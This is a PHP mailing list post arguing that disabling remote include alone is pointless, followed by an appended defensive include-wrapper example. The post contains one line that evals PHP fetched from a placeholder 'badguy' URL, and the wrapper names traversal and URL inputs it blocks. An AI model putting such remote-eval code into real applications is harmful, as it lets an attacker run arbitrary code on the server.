Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scripting attacks.
> This would be easily avoidable if we had a directive
> (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a Programmer is dumb enough to include/require untrusted source code, they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned "OFF" allow_url_include but left allow_url_fopen "ON".

If an attacker is managing to alter your PHP source to pull in his remote PHP, then the remote PHP feature isn't really all that crucial -- It's more convenient for them to suck it in from their remote server, perhaps, or maybe they are worming through a database field that is too short to hold all their source, so they shove in an "include" -- Still, *any* PHP code they can execute will eventually give them control anyway.

If an attacker gains access to remote "trusted" source and replaces it, then your decision to trust that source was faulty -- Which is neither helped nor hindered by the remote include function, really. If you needed that source, you can find a way to get it and have PHP evaluate it, unless you disable all remote file access completely... Even then, a cron job to snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is going to avoid this attack.

Turning off only the remote include, but not remote fopen, won't stop anybody with half a clue for more than 30 seconds.

This is just my take on it, and there could easily be subtle issues or known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
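The point both posters circle around is that the include target, not the ini directive, is where the control has to sit: a value that reaches include() from a request or a database field must never be allowed to name a wrapper, a URL or a path outside the application. As an added example (not code from either poster; the base directory, file name and PHP 8 are assumptions), a defensive include wrapper that enforces exactly that, alongside a check of the two directives discussed (allow_url_include was later added in PHP 5.2 with a default of Off):

```php
<?php
// Added example, not part of the original thread. Restricts include() targets to
// plain file names under one allowlisted directory, so an injected value cannot
// pull code from another host or from elsewhere on disk, whatever
// allow_url_include / allow_url_fopen happen to be set to.
// Assumes PHP 8 (str_contains). Paths below are constructed for illustration.

declare(strict_types=1);

function safeInclude(string $baseDir, string $name): void
{
    // Reject anything that looks like a stream wrapper or URL: http://, ftp://, php://, data:, ...
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)) {
        throw new InvalidArgumentException("Refusing wrapper/URL include: $name");
    }
    // Allow only a simple relative .php name; no traversal, no absolute paths, no NUL bytes.
    if (!preg_match('#^[A-Za-z0-9_/.-]+\.php$#', $name) || str_contains($name, '..') || $name[0] === '/') {
        throw new InvalidArgumentException("Refusing suspicious include name: $name");
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() is false for a missing file; the resolved path must also stay under $base
    // (a symlink inside the directory could otherwise point anywhere).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("Include target outside allowed directory: $name");
    }
    require $path;
}

// Reports the two directives from the thread as booleans, for a deployment self-check.
function remoteCodeSettings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// Constructed usage: loads modules/report.php only if it really lives under the module directory.
// safeInclude('/var/www/app/modules', 'report.php');
// var_dump(remoteCodeSettings());
```

A name such as `http://example.com/badguy.php` or `../../etc/passwd.php` is rejected before include() ever sees it, which is the check the directives alone cannot give you.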